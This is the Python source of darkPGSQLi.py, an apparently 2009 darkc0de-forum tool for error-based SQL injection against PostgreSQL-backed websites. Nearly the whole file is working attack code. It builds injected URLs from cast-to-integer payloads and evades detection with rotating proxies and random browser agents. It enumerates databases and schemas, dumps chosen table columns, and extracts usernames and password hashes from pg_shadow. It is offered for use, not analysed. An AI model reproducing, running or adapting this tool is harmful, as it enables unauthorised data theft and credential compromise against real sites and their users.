darkPGSQLi.py

#!/usr/bin/python
#     28/05/09             d3ck4, hacking.expose@gmail.com
################################################################ 
#       .___             __          _______       .___        # 
#     __| _/____ _______|  | __ ____ \   _  \    __| _/____    # 
#    / __ |\__  \\_  __ \  |/ // ___\/  /_\  \  / __ |/ __ \   # 
#   / /_/ | / __ \|  | \/    <\  \___\  \_/   \/ /_/ \  ___/   # 
#   \____ |(______/__|  |__|_ \\_____>\_____  /\_____|\____\   # 
#        \/                  \/             \/                 # 
#                   ___________   ______  _  __                # 
#                 _/ ___\_  __ \_/ __ \ \/ \/ /                # 
#                 \  \___|  | \/\  ___/\     /                 # 
#                  \___  >__|    \___  >\/\_/                  # 
#      est.2007        \/            \/   forum.darkc0de.com   # 
################################################################
# Multi-Purpose PostgreSQL Injection Tool
# FUNCTIONS
#  *error base using cast to integer method (default method n happy with it!)
#  *refer: http://hackingexpose.blogspot.com/2009/04/postgresql-error-base-sql-injection.html
#  *full schema enumeration (current database only.. still research on it)
#  *table and column dump (current database only.. still research on it)
#  *database list extractor
#  *general info gathering

# UPCOMING (contribution is most welcome!)
#  *encode to CHR() to bypass quote escaping
#  *full schema enumeration on other database
#  *table n column dump on other database
#  *blind injection support
#  *load file and copy to
#  *shell exec
#  *--update / --drop / --create / etc..

# FEATURES
#  *Round Robin Proxy w/ a proxy list (non-auth or auth proxies)
#  *Proxy Auth (works great with Squid w/ basic auth)
#  *Random browser agent chosen everytime the script runs
#  *debug mode for seeing every URL request, proxy used, browser agent used

# darkc0de Crew 
# www.darkc0de.com 
# d3ck4, hacking.expose[at]gmail[dot]com

# big credit goes to rsauron, rsauron@gmail.com.
# for the beautiful c0de of darkMySQLi & darkMSSQLi
# d3hydr8 and all the darkc0de cr3w 
 
# Share the c0de!

import urllib, sys, re, os, socket, httplib, urllib2, time, random

##Set default evasion options here
arg_end = "--" # examples "--", "/*", "#", "%00", "--&SESSIONID=00hn3gvs21lu5ke2f03bxr" <-- if you need vars after inj point
arg_eva = "+" # examples "/**/" ,"+", "%20"
## colMax variable for column Finder
colMax = 200
## Set the default timeout value for requests
socket.setdefaulttimeout(30)
## Default Log File Name
logfile = "darkPGSQLi.log"
## Agents
agents = ["Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)",
        "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)",
	"Microsoft Internet Explorer/4.0b1 (Windows 95)",
	"Opera/8.00 (Windows NT 5.1; U; en)"]

#URL Get Function
def GetThatShit(head_URL):
        source = ""
        global gets;global proxy_num
        head_URL = head_URL.replace("+",arg_eva)
        request_web = urllib2.Request(head_URL)
        request_web.add_header('User-Agent',agent)
        while len(source) < 1:
                if arg_debug == "on":
                        print "\n[proxy]:",proxy_list_count[proxy_num % proxy_len]+"\n[agent]:",agent+"\n[debug]:",head_URL,"\n"
                try:
                        gets+=1;proxy_num+=1
                        source = proxy_list[proxy_num % proxy_len].open(request_web).read()
                except (KeyboardInterrupt, SystemExit):
                        raise
                except (urllib2.HTTPError):
                        print "[-] Unexpected error:", sys.exc_info()[0],"\n[-] Trying again!"
                        print "[proxy]:",proxy_list_count[proxy_num % proxy_len]+"\n[agent]:",agent+"\n[debug]:",head_URL,"\n"
                        break
                except:
                        print "[-] Unexpected error:", sys.exc_info()[0],"\n[-] Look at the error and try to figure it out!"
                        print "[proxy]:",proxy_list_count[proxy_num % proxy_len]+"\n[agent]:",agent+"\n[debug]:",head_URL,"\n"
                        raise
        return source
    
#say hello
if len(sys.argv) <= 1:
        print "\n|-------------------------------------------------|"
        print "| d3ck4, hacking.expose@gmail.com           v1.0  |"
        print "|                                                 |"
        print "|   05/2009        darkPGSQLi.py                  |"
        print "|  -- Multi Purpose PostgreSQL Injection Tool --  |"
        print "| Usage: darkPGSQLi.py [options]                  |"
        print "|        -h help       hackingexpose.blogspot.com |"
        print "|                                                 |"
        print "| credit: rsauron, d3hydr8 @ darkc0de.com         |"
        print "| greet: Hacking Expose!, darkc0de, HMSecurity    |"
        print "| shout: vex, xum4r1x, cr4y0n, ./gmie, z4w3p      |"
        print "|-------------------------------------------------|\n"
        sys.exit(1)

#help option
for arg in sys.argv:
        if arg == "-h" or arg == "--help":
                print "\ndarkPGSQLi v1.0      d3ck4, hacking.expose@gmail.com\n"
                print "Usage: ./darkPGSQLi.py [options]"
                print "Options:"
                print "  -h, --help           shows this help message and exits"
                print "  -d, --debug          display URL debug information\n"
                print "  Target:"
                print "    -u URL, --url=URL  Target url\n"
                print "                       eg: http://www.site.com/index.php?id=1\n"
                print "  Modes:"
                print "    --dbs              Enumerate databases"
                print "    --schema           Enumerate schema (opt: -T)"
                print "    --info             PostgreSQL Server configuration"
                print "    --dump             Dump database table entries (req: -T,"
                print "                       opt: -C, --start, --where)"
                print "  Define:"
#                print "    -D DB              database to enumerate"
                print "    -T TBL             table to enumerate"
                print "    -C COL             column to enumerate"
                print "  Optional:"
                print "    --ssl              To use SSL"
                print "    --end              To use   +  and -- for the URLS --end \"--\" (Default)"
                print "                       To use /**/ and /* for the URLS --end \"/*\""
                print "    --rowdisp          Do not display row # when dumping"
                print "    --start [ROW]        Row number to begin dumping at"
                print "    --where [COL,VALUE]  Use a where clause in your dump"
                print "    --orderby [COL]      Use a orderby clause in your dump"
                print "    --cookie [FILE.TXT]  Use a Mozilla cookie file"
                print "    --proxy [PROXY]      Use a HTTP proxy to connect to the target url"
                print "    --output [FILE.TXT]  Output results of tool to this file\n"
                sys.exit(1)

#define variables
site = ""
proxy = "None"
arg_string = ""
arg_table = "None"
#arg_database = "None"
arg_columns = "None"
arg_row = "Rows"
arg_cookie = "None"
arg_insert = "None"
arg_where = ""
arg_orderby = ""
arg_debug = "off"
arg_rowdisp = 1
arg_adminusers = 10
arg_wordlist = ""
arg_ssl = "off"
arg_proxy_auth = ""
darkc0de = "SELECT+CHR(35)||CHR(35)||"
mode = "None"
lower_bound = 0
upper_bound = 16069
line_URL = ""
count_URL = ""
cur_db = ""
cur_table = ""
terminal = ""
count = 0
gets = 0
table_num = 0
num = 0
ser_ver = 3
version =[]
let_pos = 1
lim_num = 0
agent = ""

#Check args
for arg in sys.argv:
	if arg == "-u" or arg == "--url":
		site = sys.argv[count+1]
	elif arg == "--output":
		logfile = sys.argv[count+1]
	elif arg == "--proxy":
		proxy = sys.argv[count+1]
        elif arg == "--proxyauth":
                arg_proxy_auth = sys.argv[count+1]
	elif arg == "--dump":
                mode = arg;arg_dump = sys.argv[count]
        elif arg == "--schema":
                mode = arg;arg_schema = sys.argv[count]
        elif arg == "--dbs":
                mode = arg;arg_dbs = sys.argv[count]
        elif arg == "--info":
                mode = arg;arg_info = sys.argv[count] 
        elif arg == "--cookie":
                arg_cookie = sys.argv[count+1]
        elif arg == "--ssl":
                arg_ssl = "on"
#	elif arg == "-D":
#		arg_database = sys.argv[count+1]
	elif arg == "-T":
		arg_table = sys.argv[count+1]
	elif arg == "-C":
		arg_columns = sys.argv[count+1]
	elif arg == "--start":
                num = int(sys.argv[count+1]) - 1
                table_num = num 
        elif arg == "-d" or arg == "--debug":
                arg_debug = "on"
        elif arg == "--where":
                arg_where = sys.argv[count+1]
        elif arg == "--orderby":
                arg_orderby = sys.argv[count+1]
        elif arg == "--rowdisp":
                arg_rowdisp = sys.argv[count]
                arg_rowdisp = 0
	elif arg == "--end":
                arg_end = sys.argv[count+1]
                if arg_end == "--":
                        arg_eva = "+"
                else:
                        arg_eva = "/**/"
	count+=1

#Title write
file = open(logfile, "a")
print "\n|-------------------------------------------------|"
print "| d3ck4, hacking.expose@gmail.com            v1.0 |"
print "|                                                 |"
print "|   05/2009        darkPGSQLi.py                  |"
print "|  -- Multi Purpose PostgreSQL Injection Tool --  |"
print "| Usage: darkPGSQLi.py [options]                  |"
print "|        -h help       hackingexpose.blogspot.com |"
print "|                                                 |"
print "| credit: rsauron, d3hydr8 @ darkc0de.com         |"
print "| greet: Hacking Expose!, darkc0de, HMSecurity    |"
print "| shout: vex, xum4r1x, cr4y0n, ./gmie, z4w3p      |"
print "|-------------------------------------------------|\n"

#Arg Error Checking
#if mode == "None":
#        print "[-] Mode is required!\n[-] Need Help? --help\n"
#        sys.exit(1)
if mode != "None" and arg == "-u" and site == "":
        print "[-] URL is required!\n[-] Need Help? --help\n"
        print "[!] eg: http://www.site.com/index.php?id=1\n"
        sys.exit(1)

if mode == "--dump":
        if arg_table == "None" or arg_columns == "None":
                print "[-] Must include -T and -C flag.\n[-] Need Help? --help\n"
                sys.exit(1)
if proxy != "None":
        if len(proxy.split(".")) == 2:
                proxy = open(proxy, "r").read()
        if proxy.endswith("\n"):
                proxy = proxy.rstrip("\n")
        proxy = proxy.split("\n")
if arg_ssl == "off":
        if site[:4] != "http": 
                site = "http://"+site
else:
        if site[:5] != "https":
                site = "https://"+site
if site.endswith("/*"):
	site = site.rstrip('/*')
if site.endswith("--"):
	site = site.rstrip('--')
if arg_cookie != "None":
        try:
                cj = cookielib.MozillaCookieJar()
                cj.load(arg_cookie)
                cookie_handler = urllib2.HTTPCookieProcessor(cj)
        except:
                print "[!] There was a problem loading your cookie file!"
                print "[!] Make sure the cookie file is in Mozilla Cookie File Format!"
                print "[!] http://xiix.wordpress.com/2006/03/23/mozillafirefox-cookie-format/\n"
                sys.exit(1)
else:
        cookie_handler = urllib2.HTTPCookieProcessor()

if arg_columns != "None":
        arg_columns = arg_columns.split(",")
if arg_insert != "None":
        arg_insert = arg_insert.split(",")
agent = random.choice(agents)

file.write("\n|-------------------------------------------------|")
file.write("\n| d3ck4, hacking.expose@gmail.com           v1.0  |")
file.write("\n|                                                 |")
file.write("\n|   5/2009      darkPGSQLi.py                     |")
file.write("\n|  -- Multi Purpose PostgreSQL Injection Tool --  |")
file.write("\n| Usage: darkPGSQLi.py [options]                  |")
file.write("\n|        -h help      hackingexpose.blogspot.com  |")
file.write("\n|                                                 |")
file.write("\n| credit: rsauron, d3hydr8 @ darkc0de.com         |")
file.write("\n| greet: Hacking Expose!, darkc0de, HMSecurity    |")
file.write("\n| shout: vex, xum4r1x, cr4y0n, ./gmie, z4w3p      |")
file.write("\n|-------------------------------------------------|")

#General Info
print "[+] URL:",site;file.write("\n\n[+] URL: "+site)
print "[+] %s" % time.strftime("%X");file.write("\n[+] %s" % time.strftime("%X"))
print "[+] Evasion:",arg_eva,arg_end;file.write("\n[+] Evasion: "+arg_eva+" "+arg_end)
print "[+] Cookie:", arg_cookie;file.write("\n[+] Cookie: "+arg_cookie)
if site[:5] == "https":
        print "[+] SSL: Yes";file.write("\n[+] SSL: Yes")
else:
        print "[+] SSL: No";file.write("\n[+] SSL: No")
print "[+] Agent:",agent;file.write("\n[+] Agent: "+agent)
        
#Build proxy list
proxy_list = [];proxy_list_count = []
if proxy != "None":
	print "[+] Building Proxy List...";file.write("\n[+] Building Proxy List...")
	for p in proxy: 
		try:
                        match = re.findall(":",p)
                        if len(match) == 3:
                                arg_proxy_auth = []
                                prox = p.split(":")
                                arg_proxy_auth += prox
                        if arg_proxy_auth != "":
                                proxy_auth_handler = urllib2.HTTPBasicAuthHandler()
                                proxy_auth_handler.add_password("none",p,arg_proxy_auth[2],arg_proxy_auth[3])
                                opener = urllib2.build_opener(proxy_auth_handler)
                                opener.open("http://www.google.com")
                                proxy_list.append(urllib2.build_opener(proxy_auth_handler, cookie_handler))
                                proxy_list_count.append(p);arg_proxy_auth = ""
                        else:
                                proxy_handler = urllib2.ProxyHandler({'http': 'http://'+p+'/'})
                                opener = urllib2.build_opener(proxy_handler)
                                opener.open("http://www.google.com")
                                proxy_list.append(urllib2.build_opener(proxy_handler, cookie_handler))
                                proxy_list_count.append(p)
                        if len(match) == 3 or len(match) == 1:
                                print "\tProxy:",p,"- Success";file.write("\n\tProxy:"+p+" - Success")
                        else:
                                print "\tProxy:",p,arg_proxy_auth[2]+":"+arg_proxy_auth[3]+"- Success";file.write("\n\tProxy:"+p+" - Success")
		except:
			print "\tProxy:",p,"- Failed [ERROR]:",sys.exc_info()[0];file.write("\n\tProxy:"+p+" - Failed [ERROR]: "+str(sys.exc_info()[0]))
			pass
	if len(proxy_list) == 0:
		print "[-] All proxies have failed. App Exiting"
		sys.exit(1) 
	print "[+] Proxy List Complete";file.write("\n[+] Proxy List Complete")
else:
	print "[-] Proxy Not Given";file.write("\n[+] Proxy Not Given")
	proxy_list.append(urllib2.build_opener(cookie_handler))
        proxy_list_count.append("None")
proxy_num = 0
proxy_len = len(proxy_list)

#Retrieve version:user:database
if mode != "":
        site = site+"+AND+1=cast((darkc0de)+as+int)"
        head_URL = site.replace("darkc0de","CHR(35)||CHR(45)||CHR(35)||version()||CHR(35)||CHR(35)||current_user||CHR(35)||current_database()||CHR(35)||CHR(58)")+arg_end
        print "[+] Gathering PostgreSQL Server Configuration...";file.write("\n[+] Gathering PostgreSQL Server Configuration...\n")
        source = GetThatShit(head_URL)
        match = re.findall("\x23\x23\S+",source)
        match2 = re.findall("#-#([^>]+?)##",source)
        if len(match) >= 1: 
                match = match[0][0:].split("\x23")
                version = match2[0]
                user = match[2]
                database = match[3]
                print "\nDatabase:", database;file.write("\n\tDatabase: "+database+"\n")
                print "User:", user;file.write("\tUser: "+user+"\n")
                print "Version:", version,"\n";file.write("\tVersion: "+version+"\n")
        else:
                print "\n[-] There seems to be a problem with your URL. Please check and try again.\n[DEBUG]:",head_URL.replace("+",arg_eva),"\n"
                sys.exit(1)

# Mode --info
if mode == "--info":
        head_URL = site.replace("darkc0de","SELECT+CHR(100)||CHR(97)||CHR(114)||CHR(107)||CHR(99)||CHR(48)||CHR(100)||CHR(101)+FROM+pg_shadow")+arg_end
        source = GetThatShit(head_URL)
        match = re.findall("darkc0de",source)
        if len(match) >= 1:
                yesno = "YES <-- w00t w00t"
        else:
                yesno = "NO"
        print "\n[+] Do we have Access to PostgreSQL Database:",yesno;file.write("\n\n[+] Do we have Access to PostgreSQL Database: "+str(yesno))
        if yesno == "YES <-- w00t w00t":
                print "\n[+] Dumping PostgreSQL user info. user:password";file.write("\n\n[+] Dumping PostgreSQL user info. user:password")
                head_URL = site.replace("darkc0de","SELECT+CHR(35)||CHR(35)||COUNT(*)||CHR(35)||CHR(58)+FROM+pg_shadow")+arg_end
                source = GetThatShit(head_URL)
                match = re.findall("\x23\x23\S+",source);match = match[0].strip("\x23").split("\x23");userend = match[0]
                print "[+] Number of usename in the pg_shadow table:",userend;file.write("[+] Number of usename in the pg_shadow table: "+str(userend))
                head_URL = site.replace("darkc0de","SELECT+CHR(35)||CHR(35)||usename||CHR(35)||passwd||CHR(35)||CHR(58)+FROM+pg_shadow+LIMIT+1+OFFSET+NUM")+arg_end
                for x in range(0,int(userend)):
                        try: 
                                source = GetThatShit(head_URL.replace("NUM",str(x)))
                                match = re.findall("\x23\x23\S+",source)
                                match = match[0].strip("\x23").split("\x23")
                                if len(match) != 3:
                                        nullvar = "NULL"
                                        match += nullvar
                                print "\t["+str(x)+"]",match[0]+":"+match[1]+":"+match[2];file.write("\n["+str(x)+"] "+str(match[0])+":"+str(match[1])+":"+str(match[2]))
                        except (KeyboardInterrupt, SystemExit):
                                raise
                        except:
                                pass
        else:
                print "\n[-] PostgreSQL user enumeration has been skipped!\n[-] We do not have access to PostgreSQL DB on this target!"
                file.write("\n\n[-] PostgreSQL user enumeration has been skipped!\n[-] We do not have access to PostgreSQL DB on this target!")

#Build URLS for each different mode
if mode == "--schema":
	if arg_table == "None":
		
                        print "[+] Showing Tables & Columns from current database"
                        file.write("\n[+] Showing Tables & Columns from current database")
                        line_URL = site.replace("darkc0de","SELECT+CHR(35)||CHR(35)||current_database()||CHR(35)||relname||CHR(35)||attname||CHR(35)||CHR(58)+FROM+pg_class+C,+pg_namespace+N,+pg_attribute+A,+pg_type+T+WHERE+(C.relkind=CHR(114))+AND+(N.oid=C.relnamespace)+AND+(A.attrelid=C.oid)+AND+(A.atttypid=T.oid)+AND+(A.attnum>0)+AND+(NOT+A.attisdropped)+AND+(N.nspname+ILIKE+CHR(112)||CHR(117)||CHR(98)||CHR(108)||CHR(105)||CHR(99))+LIMIT+1+OFFSET+NUM")+arg_end
                        count_URL = site.replace("darkc0de","SELECT+CHR(35)||CHR(35)||COUNT(relname)||CHR(35)||CHR(58)+FROM+pg_catalog.pg_class+c+LEFT+JOIN+pg_catalog.pg_namespace+n+ON+n.oid=c.relnamespace+WHERE+c.relkind+IN+(CHR(114),NULL)+AND+n.nspname+NOT+IN+(CHR(112)||CHR(103)||CHR(95)||CHR(99)||CHR(97)||CHR(116)||CHR(97)||CHR(108)||CHR(111)||CHR(103),+CHR(112)||CHR(103)||CHR(95)||CHR(116)||CHR(111)||CHR(97)||CHR(115)||CHR(116))+AND+pg_catalog.pg_table_is_visible(c.oid)")+arg_end
        arg_row = "Tables"
        if arg_table != "None":
                        print "[+] Showing Columns from Database current database and Table \""+arg_table+"\""
                        print "\n[!] This features only working when \"magic quote is off\" on target"
                        file.write("\n[+] Showing Columns from current database and Table \""+arg_table+"\"")
                        line_URL = site.replace("darkc0de","SELECT+CHR(35)||CHR(35)||current_database()||CHR(35)||relname||CHR(35)||attname||CHR(35)||CHR(58)+FROM+pg_class+C,+pg_namespace+N,+pg_attribute+A,+pg_type+T+WHERE+(C.relkind=CHR(114))+AND+(N.oid=C.relnamespace)+AND+(A.attrelid=C.oid)+AND+(A.atttypid=T.oid)+AND+(A.attnum>0)+AND+(NOT+A.attisdropped)+AND+(N.nspname+ILIKE+CHR(112)||CHR(117)||CHR(98)||CHR(108)||CHR(105)||CHR(99))+AND+relname+=+\'"+arg_table+"\'+LIMIT+1+OFFSET+NUM")+arg_end
                        count_URL = site.replace("darkc0de","SELECT+CHR(35)||CHR(35)||COUNT(attname)||CHR(35)||CHR(58)+FROM+pg_class+C,+pg_namespace+N,+pg_attribute+A,+pg_type+T+WHERE+(C.relkind=CHR(114))+AND+(N.oid=C.relnamespace)+AND+(A.attrelid=C.oid)+AND+(A.atttypid=T.oid)+AND+(A.attnum>0)+AND+(NOT+A.attisdropped)+AND+(N.nspname+ILIKE+CHR(112)||CHR(117)||CHR(98)||CHR(108)||CHR(105)||CHR(99))+AND+relname+=+\'"+arg_table+"\'+LIMIT+1+OFFSET+NUM")+arg_end
		        arg_row = "Columns"

elif mode == "--dump":                
	print "[+] Dumping data from current database and Table \""+str(arg_table)+"\""
	file.write("\n[+] Dumping data from current database and Table \""+str(arg_table)+"\"")
        print "[+] and Column(s) "+str(arg_columns);file.write("\n[+] Column(s) "+str(arg_columns))
        for column in arg_columns:
                darkc0de += column+"||CHR(35)||"
                count_URL = site.replace("darkc0de","SELECT+CHR(35)||CHR(35)||COUNT(*)||CHR(35)||CHR(58)+FROM+"+arg_table)+arg_end
                line_URL = site.replace("darkc0de",darkc0de+"CHR(35)||CHR(58)+FROM+"+arg_table+"+LIMIT+1+OFFSET+NUM")+arg_end
        if arg_where != "" or arg_orderby != "":
                if arg_where != "":
                        arg_where = arg_where.split(",")
                        print "[+] WHERE clause:","\""+arg_where[0]+">"+arg_where[1]+"\""
                        arg_where = "WHERE+"+arg_where[0]+">"+arg_where[1]
                if arg_orderby != "":
                        arg_orderby = "ORDER+BY+'"+arg_orderby+"'"
                        print "[+] ORDERBY clause:",arg_orderby
                count_URL = site.replace("darkc0de","SELECT+CHR(35)||CHR(35)||COUNT(*)||CHR(35)||CHR(58)+FROM+"+arg_table+"+"+arg_where)+arg_end
                line_URL = site.replace("darkc0de",darkc0de+"CHR(35)||CHR(58)+FROM+"+arg_table+"+"+arg_where+"+"+arg_orderby+"+LIMIT+1+OFFSET+NUM")+arg_end
		
elif mode == "--dbs":
	print "[+] Showing all databases current user has access too!"
	file.write("\n[+] Showing all databases current user has access too!")
        count_URL = site.replace("darkc0de","SELECT+CHR(35)||CHR(35)||COUNT(datname)||CHR(35)||CHR(58)+FROM+pg_database")+arg_end
        line_URL = site.replace("darkc0de","SELECT+CHR(35)||CHR(35)||datname||CHR(35)||CHR(58)+FROM+pg_database+LIMIT+1+OFFSET+NUM")+arg_end
	arg_row = "Databases"

        #count_URL += arg_end

#Lets Count how many rows or columns
if mode == "--schema" or mode == "--dump" or mode == "--dbs":
        source = GetThatShit(count_URL)
        match = re.findall("\x23\x23\S+",source)
        match = match[0][2:].split("\x23")
        row_value = match[0]
        print "[+] Number of "+arg_row+": "+str(row_value);file.write("\n[+] Number of "+arg_row+": "+str(row_value)+"\n")

## UNION Schema Enumeration and DataExt loop
        if mode == "--schema" or mode == "--dump" or mode == "--dbs":
                while int(table_num) != int(row_value):
                        try:
                                source = GetThatShit(line_URL.replace("NUM",str(num)))
                                match = re.findall("\x23\x23\S+",source)
                                match2 = re.findall("##([^>]+?)#:",source)
                                if len(match) >= 1:
                                        if mode == "--schema":
                                                match = match[0][2:].split("\x23")
                                                if cur_db != match[0]:			
                                                        cur_db = match[0]
                                                        if table_num == 0:
                                                                print "\n[Database]: "+match[0];file.write("\n[Database]: "+match[0]+"\n")
                                                        else:
                                                                print "\n\n[Database]: "+match[0];file.write("\n\n[Database]: "+match[0]+"\n")
                                                        print "[Table: Columns]";file.write("[Table: Columns]\n")
                                                if cur_table != match[1]:
                                                        print "\n["+str(table_num+1)+"]"+match[1]+": "+match[2],
                                                        file.write("\n["+str(table_num+1)+"]"+match[1]+": "+match[2])
                                                        cur_table = match[1]
                                                        #table_num+=1
                                                        table_num = int(table_num) + 1
                                                else:
                                                        sys.stdout.write(",%s" % (match[2]))
                                                        file.write(","+match[2])
                                                        sys.stdout.flush()
                                        #Gathering list of Databases only
                                        elif mode == "--dbs":                                        
                                                match = match2[0]
                                                if table_num == 0:
                                                        print "\n["+str(num+1)+"]",match;file.write("\n["+str(num+1)+"]"+str(match))
                                                else:
                                                        print "["+str(num+1)+"]",match;file.write("\n["+str(num+1)+"]"+str(match))
                                                table_num+=1
                                        #Collect data from tables & columns
                                        elif mode == "--dump":
                                                match = re.findall("\x23\x23+.+\x23\x23",source)
                                                if match == []:
                                                        match = ['']
                                                else:
                                                        match = match[0].strip("\x23").split("\x23")
                                                if arg_rowdisp == 1:
                                                        print "\n["+str(num+1)+"] ",;file.write("\n["+str(num+1)+"] ",)
                                                else:
                                                        print;file.write("\n")
                                                for ddata in match:
                                                        if ddata == "":
                                                                ddata = "NoDataInColumn"
                                                        sys.stdout.write("%s:" % (ddata))
                                                        file.write("%s:" % ddata)
                                                        sys.stdout.flush()
                                                table_num+=1
                                else:
                                        if mode == "--dump":
                                                table_num+=1
                                                sys.stdout.write("\n[%s] No data" % (num))
                                                file.write("\n[%s] No data" % (num))
                                        break
                                num+=1
                        except (KeyboardInterrupt, SystemExit):
                                raise
                        except:
                                pass

#Lets wrap it up!
if mode == "--schema" or mode == "--dump":
        print "\n\n[-] %s" % time.strftime("%X");file.write("\n\n[-] [%s]" % time.strftime("%X"))
else:
        print "\n[-] %s" % time.strftime("%X");file.write("\n\n[-] [%s]" % time.strftime("%X"))
print "[-] Total URL Requests:",gets;file.write("\n[-] Total URL Requests: "+str(gets))
print "[-] Done\n";file.write("\n[-] Done\n")
print "Don't forget to check", logfile,"\n"
file.close()